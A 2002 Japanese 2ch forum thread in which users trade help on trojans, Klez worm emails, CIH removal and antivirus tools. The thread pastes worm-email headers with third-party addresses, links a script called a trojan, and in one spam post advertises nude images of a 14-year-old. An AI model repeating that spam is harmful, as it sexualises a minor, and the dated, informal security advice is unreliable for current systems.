(連カキコすまそ。パソ初心者だからどうしていいかわからんで途方にくれてます)

245 :名無しさん@お腹いっぱい。:02/06/25 03:00
apacheの話題があんまりでてないけどなぜなんだろう・・・
攻撃するコードも出回ってるしこれがウィルスにでも
仕込まれたらCodeRedの再来に・・・
いや、もっとすごい祭りになりそうな予感がするのは俺だけ?

246 :名無しさん@お腹いっぱい。:02/06/25 03:16
Windows XPなのですが、エクスプローラでprogram filesをチェックしていたら、「xerox」っていうフォルダができていて、
その中には、「nwwia」っていうフォルダがあり、その中は空でした。それで、あやしいと思って、
フォルダを削除しようとしたら、そのプログラムが使用中ですというメッセージがでて削除できません。
今のところPCに異常はないですが、とてもあやしいフォルダです。対処法を教えてください。

247 :名無しさん@お腹いっぱい。:02/06/25 03:23
あのー、「whismng.exe」を検索してみたら1個ファイルが出たんですが
これは危ないんでしょうか?

248 : :02/06/25 03:26
>>245
どっかでスレッドみた気がするが…


>>246
googleはとても役に立つぞな。
http://www.fujixerox.co.jp/release/2001/1228_nwwia.html

249 :名無しさん@お腹いっぱい。:02/06/25 03:28
>>246
安全なもんだったと思うけど。ゼロックスでしょ。
x が抜けた erox はダメだけどね。

250 : :02/06/25 03:29
>>247
トロイ。
http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

251 :名無しさん@お腹いっぱい。:02/06/25 03:51
>250
バスター最新版に引っかからないんだけど...。

252 :名無しさん@お腹いっぱい。:02/06/25 04:08
>249
それは、どういったものなんですか?ゼロックスって?
どうやって削除したらよいのですか?
?ばっかりですいません。

253 :名無しさん@お腹いっぱい。:02/06/25 04:15
>249
すいません、ヤフーでnwwiaを検索したらでました。
やっぱり、ウイルスと間違う人いたんですよね。
だって、xeroxだもん、エロがバツで囲まれてて、削除できないなんて、とってもこわい。
今日の探偵日記のオカルトHPもたいがい怖かったけど。

254 :名無しさん@お腹いっぱい。:02/06/25 04:15
>>252

>>248のリンク先に書いてあることを10回暗唱してくれ。

255 :名無しさん@お腹いっぱい。:02/06/25 04:43
あの、ウイルスかもしれない添付メールを
「差出人」へとやって、送り主確認するのは
あまり良くない行為ですか?

256 :名無しさん@お腹いっぱい。:02/06/25 04:58
(=・ェ・=)ううん。。

257 :名無しさん@お腹いっぱい。:02/06/25 09:55
いままでIEのアイコンをクリックするだけでネットに
繋がってたんですが、なぜか
オフラインです、つなげますか?
と聞いてくるようになりました。
やばいですか?

258 :257:02/06/25 09:57
ADSLでした。
ダイアルアップモデムは付けてません。
JC_NOCLOSEと言うウイルスに感染したことが
あります。


259 :名無しさん@お腹いっぱい。:02/06/25 11:12
>オフラインです、つなげますか?

「要求されたWebページは、オフラインで使用できません。
このページを表示するには、[接続]をクリックしてください。」じゃなくて?


260 :ななし:02/06/25 12:23
ウィルスが送られてくる方にメールをしたら「自分も被害者なので私のメアドを
受信拒否してください」とのことでしたがメアド受信拒否ってどうやるのですか?

261 :名無しさん@お腹いっぱい。:02/06/25 13:29
>>260
鯖で拒否する→ISPのサポートに聞け
メーラで拒否(削除)する→メーラのマニュアル嫁

262 :名無しさん@お腹いっぱい。:02/06/25 13:47
以前、ワームが立て続けに送られてきたので、相手方ISPを割り出し、メールを送りますた。
送信サーバのISPと接続に使ってるISPが別々だったので、両方に。
で、送信サーバのISPからはすぐに返事が返ってきて、
調査の上、該当者が判明した場合は利用規約に基づき対応致します・・・という返事。
その後、ワームは来なくなった。(某Dネット)
で、問題は接続に使ってると思われるISP。
数日後に返事が来たと思ったら、関係部署へメールを回します。だと。
で、それから数週間経ってメールが来た。
「インターネットが一般的になるにつれ、Yahoo! JAPANのサービスが悪用される
ケースも増えております。
お知らせいただきました件については、利用規約とガイドラインに照らし、
チェックさせていただきます。」
というコピペメール。未だにログも見てないらしい。
しかもYBBのサポートに送ったのに、何故Yahooメールの方から連絡が来る?
もうすでに解決したからいいけど、もしこれがYBBのみのユーザだったら、
ISPの対応はほとんど望めません。というか、こんなトロい&危機感のないところが
プロバイダーをやってるって事が驚き、というか恐すぎ。

263 :名無しさん@お腹いっぱい。:02/06/25 16:04
>>260
サーバーで拒否するやり方は知らないけど、Outlook Express 5.5 だと、受けたメールを
送信者で分類して削除済フォルダに入れることはできる。それなら個別に触らず削除可能。
ツール→メッセージルール→禁止された送信者の一覧 でルール編集。

264 :207:02/06/25 16:51
Macですがノートンで遂に警告がでますた。
削除してくれた様ですが
Oldgirl Hotline Trojan ってどんな種類のトロイなんでしょうか?
Hotlineに関係するものなのですか?

マカーだからレスつかねえ、HP調べてもひっかからねえ。
ノートン内のデータベースには名前があって検索できんのにな。。

265 :名無しさん@お腹いっぱい。:02/06/25 16:54
>>264
google でもさがせねーYO!!

266 :名無しさん@お腹いっぱい。:02/06/25 17:31
>>255
それがKLEZだった場合、送り返した先は感染者とは無関係の場合がほとんど。
あなたのせいでその人を感染させる危険があります。


267 :Found virus WORM_KLEZ.E :02/06/25 17:32
Received:from nu.vpo.fenics.or.jp (202.248.63.186) by ** with SMTP; **
Received:from Hnognvqey (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id KAA13623 for < listmgr1@clickformail.com >; **
Date**
Message-Id:< 200206250102_KAA13623@nu.vpo.fenics.or.jp >
From:ogawanwa< ogawanwa@h5.dion.ne.jp >
To: 200206250102_KAA13623_KlezE_@nu.vpo.fenics.or.jp
listmgr1@clickformail.com vipar@verio.net vipar_verio_net@clickformail.com
Subject:A very nice game

This is a very nice game
This game is my first work.
You're the first player.
I expect you would enjoy it.

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=202.248.63.0

------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file install.exe
The file is deleted.

---------------------------------------------------------

268 :名無しさん@お腹いっぱい。:02/06/25 19:02
<090○1975329@docomo.ne.jp>

こいつから
WORM_KLEZ.H 送られてきた・・・
送り返したけど、届かなかった

269 : :02/06/25 19:52
(^∀^)ゲラゲラ 携帯に送ってどうしようってんだ

270 :名無しさん@お腹いっぱい。:02/06/25 19:57
>>268
携帯からクレズなんか送られてくるはずない。

271 :,,:02/06/25 20:45
ここでクイズです。携帯からWORM_KLEZ.Hを飛ばせるか?

__         __      __
|無理| ΛΛ   |OK| ΛΛ   |無理| ΛΛ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚)  〃 ̄∩ ゚Д゚) < わかりません・・・?
    ヾ.      ヾ.   )    ヾ.    \_____________
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
\                                  \
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
  |           クレズ製作委員会           |
  |                              |
\|                              |


272 :名無しさん@お腹いっぱい。:02/06/25 22:47
また来たよ・・・。
差出人が「admin」で
タイトルが「Language」。
ファイルサイズが122kバイトとやたらに大きい。
恐らくウィルスでしょうね。


273 :名無しさん@お腹いっぱい。:02/06/25 23:01
>>272
報告しなくていいから。

274 :名無しさん@お腹いっぱい。:02/06/25 23:07
毎回違う英語の題名で内容も全て英語で添付ファイルの付いたメールが毎日送られてきます。
プロバイダにウィルスチェックしてもらってます。
ファイルを開くと以下のような英文が2行あるだけで何も起こりません。
File attachment: Ait.bat
The file attached to this email was removed because it was infected with the W32.Klez.gen@mm virus.
以前はパソコンに来てましたが、最近はパソコンには一通も来なくなり、携帯メールにだけ送られてきます。
これって何ですか?やっぱりウィルスですか?
送っている方はやはり恨みでもあるんですかねえ?
大抵違うアドレスからです。たまに以前と同じ時もあります。



275 :名無しさん@お腹いっぱい。:02/06/25 23:40
>>274
>プロバイダにウィルスチェックしてもらってます
だから、そこでウィルスが駆除されてるんだって。
クレズが入っていたから添付ファイルを取り除きましたって書いてあるよ。

276 :264:02/06/25 23:43
ttp://membres.lycos.fr/javascriptrest/beberscripts/scriptnt/45.js
たのむ、そろそろレスクレ 上のがトロイだっつーあれ!

277 :名無しさん@お腹いっぱい。:02/06/26 00:34
今日は2通きたよ。YAHOOのメアドに。
「HI、******(ID)、HONEY」ってやつと、
「INTRODUCTION ON ADSL」ッて奴。
両方とも内容無しの添付ファイルのみ。速攻削除。

278 :名無しさん@お腹いっぱい。:02/06/26 00:51
>>273

279 :名無しさん@お腹いっぱい。  :02/06/26 02:15
URLクリックすると必ずbbspinkとか言うところに飛んでしまいます。

280 : :02/06/26 02:37
>>279
そうか

281 :ko-man:02/06/26 08:47
それにしても、サーバーの段階でウィルスを取り除いてくれる?サービス利用者多いね。
安いのかな?
だって、ウィルス定義最新で、添付ファイル開かないで、OE以外のテキスト系メーラー
つかってれば必要なくなくなくなくなくなくな〜い?

282 :名無しさん@お腹いっぱい。:02/06/26 08:50
>>279
なんか初級ネットでも見たような。マルチ多いなあ。

283 :名無しさん@お腹いっぱい。:02/06/26 09:40
>>281
添付ファイル開かないで、OE以外のテキスト系メーラー使っていれば

その他にはなにもいらないけどな(w


284 :名無しさん@お腹いっぱい。:02/06/26 10:19
>>281
ウィルス定義の年間購読料考えると200円/月位は手間いらずでいいんじゃないの。

285 :コー:02/06/26 12:11
すみませんが助けてください。
気づいたら2chから別のサイトへリンクしようとするとアドレスの前にhttp://ime.nuが勝手に付くようになってしまい困っています。
ADAwareでは検出されないしどうしたら治るのでしょうか?

286 :名無しさん@お腹いっぱい。:02/06/26 12:23
普通です。

はい次の方どうぞ

287 :285:02/06/26 12:32
>>285 手動で削除しないと飛べないんです。
どうしてこれが普通なんですか?

288 :名無しさん@お腹いっぱい。:02/06/26 12:34
>>285
ime.nuが逝ってしまっている際には、いったんime.nuに逝けないので
エラーが起こるが、実はいつも付けられる仕様になっている。
直リンクリックせず、範囲指定してコピペか、
アドレス欄でちょこちょこっと消してエンターキーでOK。
もっと知りたかったら、初心者の質問板か批判要望板へ。

289 :名無しさん@お腹いっぱい。:02/06/26 12:35
2chからの直リンはそういう風になるようになってんの。
ブラクラ、ウィルス踏んでも文句いうなよってのと
2chからのリファラ落とすのが目的じゃねーの?

>手動で削除しないと
ime.nuの画面でリンク出るだろうが。それ踏め

290 :名無しさん@お腹いっぱい。:02/06/26 12:36
被ったし、丁寧な説明やねえ。
なんでもかんでもウィルスやスパイウェアのせいにする厨は嫌いや・・・

291 :285:02/06/26 12:41
ということはみんな今直リンできない状態ですか?

292 :名無しさん@お腹いっぱい。:02/06/26 12:44
>>291
だから、そういうの知りたい場合は初心者の質問板か
批判要望板へって。ウイルスじゃないことはたしかなんだし、
2ちゃんの仕様に関することだって分かったんだから。

293 :285:02/06/26 12:46
分かりました。逝ってきます。ありがとう。

294 :285:02/06/26 12:54
批判要望板が真っ白なのですがどうして?

295 :名無しさん@お腹いっぱい。:02/06/26 12:57
・・・(w

296 :名無しさん@お腹いっぱい。:02/06/26 12:58
ちなみに批判要望板は落ちてないぞ

297 :285:02/06/26 13:02

みなさん批判要望板は普通にみれますか。

298 :名無しさん@お腹いっぱい。:02/06/26 13:15
>>297
更新かリロードするとか、Ctrl+F5やってみるとか
時間をおいていくなり、初心者の質問を見てみるなり、
インターネットキャッシュのクリアするなりしてみてくれ。
ここでアンケート募るべき問題ではないと思う。

299 :名無しさん@お腹いっぱい。:02/06/26 13:17
>>297 見れるよ。
2ch鯖勝手な監視所http://mappy.mobileboat.net/~seek/で確認汁。


300 :名無しさん@お腹いっぱい。:02/06/26 13:19
>285 もう来んな。

301 :こんなのきました:02/06/26 13:29
Date: Wed, 26 Jun 2002 12:39:16 +0900 (JST)
From: kyojack <kyojack@muse.ocn.ne.jp> | このアドレスを受信拒否 | アドレスブックに追加
To:
Subject: A humour game

Hello,This is a humour game
This game is my first work.
You're the first player.
I hope you would like it.

添付
file.html
タイプ .html ファイルを保存

添付
rock.exe
タイプ .exe ファイルを保存

添付
file.txt
タイプ .txt ファイルを保存

添付
dianne2-thumb-986072648
タイプ ファイルを保存

302 :Virus Warning Message :02/06/26 16:59
Received:from nu.vpo.fenics.or.jp (202.248.63.186) by ** with SMTP; **
Received:from Zsmszalcs (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id KAA03962 for < listmgr1@clickformail.com >; **
Date**
Message-Id:< 200206260120_KAA03962_Virus_deleted@nu.vpo.fenics.or.jp >
From: k-1632< k-1632@abox7.so-net.ne.jp >
To: vipar@verio.net vipar_verio_net@clickformail.com
ES2508_20020620_1658@funfabdeals.com remove@paymentmarketing.com
hostmaster@ccom.net asnadmin@interland.com 今までのスパマーのアドレス
Subject: 廠・/td>

------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file Files.pif
The file is deleted.

---------------------------------------------------------

http://www.google.com/search?q=k-1632@abox7.so-net.ne.jp&ie=UTF-8&oe=UTF8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

303 :名無しさん@お腹いっぱい。:02/06/26 21:34
>>302
アタマわるぅ。しかもマルチ。

304 :名無しさん@お腹いっぱい。:02/06/26 21:57
スパマーにメルアド握られるようなヘタレだし。

305 : :02/06/26 23:04
メールが一通も来ない屁垂れだし。

306 :W32.Elkern removal tools:02/06/27 02:29
Received:from imfep01.kcom.ne.jp (210.174.120.145)
by ** with SMTP; **
Received:from Hsxwzch ([61.124.51.106]) by imfep01.kcom.ne.jp
(InterMail vM.4.01.03.00 201-229-121) with SMTP id < 20020626144409_HAOT26773_imfep01_kcom_ne_jp@imfep01.kcom.ne.jp >
for < newsletter8819@eudoramail.com >; **
From:wine< wine@pk.highway.ne.jp >
To: newsletter8819@eudoramail.com hostmaster@ns.chinanet.cn.net
shenjun@cndata.com ipgl@pub.ln.cninfo.net
Subject: W32.Elkern removal tools
Message-Id:< 20020626144409_HAOT26773_Virus_deleted@imfep01.kcom.ne.jp >
Date**

Mcafee give you the special W32.Elkern removal tools
W32.Elkern is a special dangerous virus that can infect on Win98/Me/2000/XP.
For more information,please visit http://www.Mcafee.com

307 :たしけてーーーー:02/06/27 19:02
1.最近何度か妙なメールで、プレビューするだけで勝手にWMPが開いて、ってのが
何度かあった。『リダイレクトに問題が発生したため開けませんでした』
ってメッセージが出る。
2.それと関係してかどんどんアプリケーションが使えなくなってきた。
dllファイルがなくなってたり、×マーク画面に英語でメッセージ出て立ち上がらなかったり。
3.やばそうなんでとりあえず重要なデータはCDRに逃がそうかと思ったらライティングソフト
(EasyCD Creator4)が立ち上がらない。やっぱり×に英語のメッセージ。
再起動したら《CDUDFLIB.DLLが見つかりません》って出て、その後はボロボロ。
スキャンソフト走らせようとしても消えてて、ネットでスキャンしようと思ったら
接続できない。
4.しゃーないから必要最低限のデータはDドライブに入れてフォーマット。
5.フォーマット終了後、すぐにプロバイダのウィルスチェックサービスに入った。
(ASAHIネット)3時間以内に有効になると聞き3時間経ってから再起動。
6.しかし2と同じような症状。プリインストールのウィルススキャンは起動して
数秒で消えて使い物にならない。
7.更にフォーマット、最初の内はCDライティングソフトもウィルススキャンも行けた。
スキャンして感染もなかった。
8.2時間が経ってさっきまた立ち上げたら2の症状が(T_T)

何なんでしょう。。。ちなみにOSは98SE、IE6、OE、スキャンはマカーフィー、
FMVのME4/657、フレッツ1.5Mで接続してます。
まったく仕事になりません、助けて下さい........

308 :名無しさん@お腹いっぱい。:02/06/27 19:22
( ´_ゝ`)ふーん。そりゃ困った困った。

309 :名無しさん@お腹いっぱい。:02/06/27 19:54
>>307
まさか再インストール後にそのメールをプレビューしたりしてないよね?
マカフィーはちゃんと更新してるよね?

310 :名無しさん@お腹いっぱい。:02/06/27 19:57
>>307

1. 必要最低限のデータ  ←これ怪しい。。

2. ハードディスクが逝ってる。

311 :名無しさん@お腹いっぱい。:02/06/27 22:30
ttp://home9.highway.ne.jp/ando-ke/menu.html
このサイト覗くと、NortonAntiVirusが一瞬だけ反応します。
発信メールのスキャン云々って文字が見えるんですが…
かと言ってmailboxには何も無し一体なにしてるんでせうか?
OSはwin2k、UpDateを常に心がけてます
ブラウザはopera6をMSIE5として認識させてます
javaプラグイン等を全てオンにしとくと成ります。

動作確認済みブラウザに含まれて無いのも解ります
java関係が妖しいのもなんとなく解ります。
ただ、他のサイトではこのような問題起きなかったし
誰か見知らぬ人にmailが送られているようでしたら大変です。
お手数ですが誰か解る方、ご教授お願いします。

312 :馬鹿ヒーの佐藤さん:02/06/27 22:43
Received:from smtp.solid.ad.jp (61.115.237.40)
by ** with SMTP; **
Received:from Awvmdejt(nttkngw013009.flets.ppp.infoweb.ne.jp [61.124.51.9])
by smtp.solid.ad.jp (8.9.3/3.7W) with SMTP id VAA43222
for < newsletter8819@eudoramail.com >; **
Date**
Message-Id:< 200206271208_VAA43222_Virus_deleted@smtp.solid.ad.jp >
From:ryo_tabata< ryo_tabata@hotmail.com >
To: newsletter8819@eudoramail.com
nttkngw013009_flets_ppp_infoweb\ne_jp_Virus_deleted@smtp.solid.ad.jp
200206271208_VAA43222@smtp.solid.ad.jp 61_124_51_9_Virus_deleted@smtp.solid.ad.jp
Subject: Border


馬鹿ヒーの佐藤さん
Yahoo!掲示板: 9737(CSK)
ホーム>ビジネスと経済>金融と投資>株式>サービス業> 9737 (CSK)
前の40件 | 次の40件 [ 最初 | 最新 ] No. 投稿
No.   タイトル 投稿者 日時 
42648 おめでとうございます。
PantherSJK 2002/ 5/21 16:35
42647 近日中に4000円代通過
BD19651221 2002/ 5/21 16:33
42646 自己株取得枠の設定を決議
go_home_amat 2002/ 5/21 16:32
42645 CSK、1000万株の自己株取得
takeshi140 2002/ 5/21 16:29
42644 爆騰決定です!
SINJINCHARTWATCHER 2002/ 5/21 16:26
アドレス
http://messages.yahoo.co.jp/bbs?action=topics&board=1009737&sid=1009737&type=r

313 :名無しさん@お腹いっぱい。:02/06/27 23:08
(272と同一人物)
どうやらKlezには感染してなさそうです。
落とし込まれたファイルやレジストリの書き換えが見当たりません。
でもしっくりきません。
WindowsのSystemフォルダに「KERNEL32.EXE」というフォルダが見つかりました。
ファイルではなくフォルダなんですが、これは一体・・・。


314 :名無しさん@お腹いっぱい。:02/06/27 23:16
昨日突如フリーズ>再起動>レジストリが不正ですので修復します
>!?なんか3ヶ月ぐらい前の状態に戻ってる>復元>ウマー
>ウイルスチェック>W95/chi10ハケーン
なのです。で、今あちこちのサイト検索して駆除しようとしているのですが
イマイチわかりません。助けてください
今使用しているOSはmeです。本日ウイルススキャンオンラインを購入してきて
駆除しようと思いましたが、ウイルスを発見するだけで削除、駆除ができません
(ノー豚買えばよかった・・・)

315 :名無しさん@お腹いっぱい。:02/06/27 23:18
>>313
キミこのツール使ってない?
FIX_BADTRANS.B

http://216.239.51.100/search?q=cache:J4O1JAWCgQUC:inet.trendmicro.co.jp/solutionfile/3378readme.txt+KERNEL32.EXE&hl=ja&lr=lang_ja&ie=UTF-8

316 :名無しさん@お腹いっぱい。:02/06/27 23:31
>>314
まずこれだよ。
ttp://www.symantec.com/region/jp/sarcj/kill_cih.html

317 :名無しさん@お腹いっぱい。:02/06/27 23:33
いやいや、McAfeeだけど、現在エンジン古すぎて定義ファイルに追いついてない。

318 :名無しさん@お腹いっぱい。:02/06/27 23:35
317に追加

>>315


319 :名無しさん@お腹いっぱい。:02/06/27 23:40
>>317-318
313ですか?


320 :名無しさん@お腹いっぱい。:02/06/27 23:41
>>319
はい。

321 :名無しさん@お腹いっぱい。:02/06/27 23:42
>>317
とにかく最新の定義でなきゃ対策ソフトの意味なし。

322 :314:02/06/27 23:46
>>316 それは昨日やりましたが、次のnavcという物を落として起動した時点で
わからなくなったのであきらめてしまいました。ここから先はどうすればよいのでしょうか?

323 :名無しさん@お腹いっぱい。:02/06/27 23:47
>>321
むしろ、エラー起こしてエンジン自体が強制終了・・・。
とりあえず、Trend Microのツール実行後のログファイルを下に書きます。



================================================================
Start : FIX_BADTRANS version 1.10
Windows Platform : Windows 98
Tool configuration:
Scan Files: Yes
Quiet Mode: Yes
Date and Time: Thu Jun 27 23:45:47 2002

I. Terminating Worm/Virus processes.
*** Infected processes were NOT found. ***

II. Cleaning System Registry.
WORM_BADTRANS.B not found in the SYSTEM REGISTRY

III. Removing drop files.
File "C:\WINDOWS\SYSTEM\kernel32.exe" not found
File "C:\WINDOWS\SYSTEM\kdll.dll" not found
File "C:\WINDOWS\SYSTEM\cp_25389.nls" not found

IV. Inoculating the system.
Creating [KERNEL32.EXE]. Folder created.
System Inoculated

Stop
Date and Time: Thu Jun 27 23:45:48 2002
========================================================

324 :315:02/06/27 23:47
>>320
KERNEL32.EXEをgoogleで検索したまでです。
気になるならいろいろ見てみれば?
それと、とりあえず無償ソフトDLするかだね。
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】
ttp://pc.2ch.net/test/read.cgi/sec/1015584020/
・アンチドート簡易版
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html


325 :名無しさん@お腹いっぱい。:02/06/27 23:52
>>323
名無しだからわからないYO!
なんでそのツール実行した?
感染の疑いがあったのか?ワケわからん・・・

326 :名無しさん@お腹いっぱい。:02/06/27 23:52
>>324
ただいまダウンロード中です。

327 :名無しさん@お腹いっぱい。:02/06/27 23:56
>>325
インターネット接続直後に、こっちの意図とは無関係に
データの送受信が数秒間行われた。
もしかしたら個人情報がどこかに送信されたのではないかと思って。

328 :名無しさん@お腹いっぱい。:02/06/27 23:57
>>322
Special instructions for installing and using the special NAVC for W95.CIH:
カイドク中だから30分くらい待っててくれ。

329 :名無しさん@お腹いっぱい。:02/06/27 23:59
>>327
それでどーしてFIX_BADTRANS version 1.10 が出てくるんだYO!

330 :314:02/06/28 00:02
>>328 お手数かけます。只今他の方法を探してみました。
ウイルスは_RESTOREにいるので
http://support.microsoft.com/default.aspx?scid=%2Fisapi%
2Fgomscom%2Easp%3Ftarget%3D%2Fjapan%2Fsupport
%2Fkb%2Farticles%2Fjp263%2F4%2F55%2Easp&LN=JA
の方法でいけるのではないかと思うのですが・・・どうでしょうか?

331 :名無しさん@お腹いっぱい。:02/06/28 00:03
>>329
原因が、メール見ただけで添付ファイルを実行しようとするやつだったから。
一応ブラウザはIE6だから、ブラウザやOutlookExpressでも一発感染はないはずなのだが、
念のため。

332 :名無しさん@お腹いっぱい。:02/06/28 00:06
(331に追加)
先日、そのような怪しいメールが3通来て、
そのうちの1通の差出人が「admin」だったから。


333 :314:02/06/28 00:12
いま330で書いた方法でチャレンジしました。
只今ウイルスチェック中・・・

334 :名無しさん@お腹いっぱい。:02/06/28 00:21
(332と同一人物)
とりあえずAntidoteの無償版をダウンロードしたので、今からチェックかけます。
ありがとうございました。


335 :328:02/06/28 00:32
>>322
わかったことだけ書く。ノートンのレスキューディスクを使えとあるが、
普通の起動ディスクで代用できるかどうか。
まずマイコンピュータでC:を選んで新規フォルダを作成する。名前はNAVC。
DLしたnavc10.exeをそのフォルダに入れる。
(ノートンレスキューディスク)フロッピーから(!!)PCを再起動。そして、

type "c:" and then press enter. (c:を入力)
Next type "cd \NAVC" then press enter. (引用符内を入力)
Next type "NAVC10" then press enter.(NAVC10と入力)
At this point it will ask you if you want to unzip files.
(↑ここで圧縮ファイルを解凍するか聞かれるので、)
Type "yes" for yes.(yesを選択)
次に。
type "NAVC C: /doallfiles /repair". (長いけどこれを入力)
ここで駆除作業が始まる。
終わったらフロッピーを抜き、再起動。

と、こうだが、問題は起動ディスクを持ってるか、そしてそれでうまくいくか、だね。

336 :328:02/06/28 00:44
>>330
どうだろうね。使用したアンチウィルスソフトを信用できるなら、結果オーライということ。

337 :名無しさん@お腹いっぱい。:02/06/28 00:48
>>334
了解ですが、「KERNEL32.EXE」フォルダができた理由はわかるよね?
ウィルスの名前がわからないうちに特別なツール使う必要は・・・
ま、いいです。

338 :名無しさん@お腹いっぱい。:02/06/28 00:57
>>337
Antidoteチェックの結果

\Windows\TEMP フォルダ内に「Badtrans」発見。
ただ、レジストリに書き込まれてないので感染してはいないようだ。
もしこれで感染したというのなら、亜種か新種しかありえない。


339 :名無しさん@お腹いっぱい。:02/06/28 01:04
>>338
それ削除できた?
メール受信時にノーチェックだと、そのメールを少しいじった時に
TEMPファイルに入るんじゃないかな?実行されなくても。

340 :名無しさん@お腹いっぱい。:02/06/28 01:07
>>339
削除しました。絶対に左クリックしないように慎重に。

341 :314:02/06/28 01:13
>>328 削除できました!ご迷惑おかけしました

342 :名無しさん@お腹いっぱい。:02/06/28 01:17
>>339
とりあえず、一件落着(にしておきましょう)。
ありがとうございました。


343 :339:02/06/28 01:18
>>340
あ、TEMPフォルダの中のファイルを、削除できましたか?

344 :339:02/06/28 01:18
>>342
あい。

345 :ウヨク氏ね:02/06/28 13:43
>>182
ゼブラマンセー!!!!!

346 :Found virus WORM_KLEZ.E :02/06/28 17:04
Received: from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; **
Received: from Trh (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id OAA26051 for < vipar@verio.net >; **
Date**
Message-Id:< 200206280548_OAA26051@nu.vpo.fenics.or.jp >
From:ancolo< ancolo@kikimimi.ne.jp >
To: 200206280548_OAA26051_Virus_Deleted@nu.vpo.fenics.or.jp
ancolo_kikimimi_ne_jp_Virus_Deleted@nu.vpo.fenics.or.jp
Subject: Height
------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file href.pif
The file is deleted.

---------------------------------------------------------
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=FENICS.OR.JP
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=202.248.63.0

347 :Virus Warning Message :02/06/28 17:05
Received: from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; **
Received: from Wpdwk (localhost [127.0.0.1]) by nu.vpo.fenics.or.jp (8.9.3/3.7W)
with SMTP id KAA25355 for < vipar@verio.net >; **
Date**
Message-Id:< 200206280110_KAA25355@nu.vpo.fenics.or.jp >
From:aries< aries@jhgf.net >
To: 200206280110_KAA25355_Virus_Deleted@nu.vpo.fenics.or.jp
aries_jhgf_net_Virus_Deleted@nu.vpo.fenics.or.jp
Subject: Function
------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file type.bat
The file is deleted.

---------------------------------------------------------
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=FENICS.OR.JP
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=202.248.63.0

348 :名無しさん@お腹いっぱい。:02/06/28 21:36
知らない間にマンキン.exeなんか入ってたよ。
やっぱりうpロダでむやみにファイル落とすのは危険だな。

349 :名無しさん@お腹いっぱい。:02/06/29 03:03
回線はADSLでルーターを使用してネットをしているんですが
最近よく通信が途絶えるようになり、その時にログを
見るとこんな状態になっています。

送信元    送信先ポート  送信先
TCP *.*.*.*  1362 1362  *.*.*.*    80   0
TCP *.*.*.*  1374 1374  *.*.*.*  80   0
TCP *.*.*.*  1375 1375  *.*.*.*  80   0
        〜1395 4153まで
<No UDP Sessions>

送信元は自分のIPで、どうやらIEでアクセスした
サーバにポートスキャンをかけていると言う感じがするのですが、
このような動作をするウィルスをご存知の方おられませんか?

350 :名無しさん@お腹いっぱい。:02/06/29 19:02
ちょっと聞きたいんだけど、ウィルスやスパムメール対策としてモバイル用だけど
NTT Docomoの moperaサービスを使うってどう??
普通のPCで使えそうなんだけど。添付ファイルの有無やメールサイズでも
着信拒否ができて、サーバで消してくれる。WEBメーラーも使える。(無料)
難点はメール容量と使用料?
ttp://www.mopera.net/service/moperan/index.html
ttp://www.mopera.net/service/mail.html
意見ちょうだい。

351 :名無しさん@お腹いっぱい。:02/06/29 19:32
>>349

http://pc.2ch.net/test/read.cgi/sec/1024963492/219-223

352 :名無しさん@お腹いっぱい。:02/06/29 19:54
スマン質問なんだがときどきネットに接続してると「例外OEからの呼び出しです。」って
言う蒼い画面になって再起動か電源押しっぱなしで強制終了しかないんだけどこれって
アタック?最近これになるのが多くて困るんだよ・・・

353 :名無しさん@お腹いっぱい。:02/06/29 19:57
>>352
スキャンディスクなどやって問題なければレジストリ再構成。

354 :名無しさん@お腹いっぱい。:02/06/29 20:03
B83W59H86(14歳)セルフヌード衝撃うp祭り開催中!!
http://tmp.2ch.net/test/read.cgi/mog2/1022943102/l50

355 :名無しさん@お腹いっぱい。:02/06/29 20:03
>>353
って事はこの状態は避けようがないの?毎回再起動されると鬱にならないか?

356 :cheshire-cat:02/06/29 20:07
>>355
Norton UtilityとかFirst AIDとかのユーティリティソフト使ってスキャンって手も。
これ系のツールは「変なパソが何とかうまくやって来た」のを、「無理矢理正しい?状態に設定」させるんで、かえって不具合生じたりする事もあるんで、自己責任でやってちょ。

なお実行前に、ユーティリティソフトはUpdateした方が良い。
古いバージョンで新しいOSとかサービスパック導入機をスキャンするのって、自殺行為だから。

357 :名無しさん@お腹いっぱい。:02/06/29 20:14
>>355
だからレジストリ適性化するソフト探してみて。

358 :名無しさん@お腹いっぱい。:02/06/29 20:16
>>357
×適性→○適正

359 :名無しさん@お腹いっぱい。:02/06/29 20:29
>>356.357.358
ありがdm(_ _)m

360 :マジでコマってます!!助けて!:02/06/29 21:13
よくわからないexeウイルスにマイドキュメントフォルダ消されてしまいました。。。
Eの中全部とマイドキュメント全部消されたのですが復元は可能でしょうか?
どうか!!どうか!おねがいします!!


361 :名無しさん@お腹いっぱい。:02/06/29 21:17
よくわからない.exeはここでは初出です。 最近は上書きするので、おそらく駄目でしょう。

362 :名無しさん@お腹いっぱい。:02/06/29 21:38
>>360
ウィルスの名前出さなきゃ答えられない。
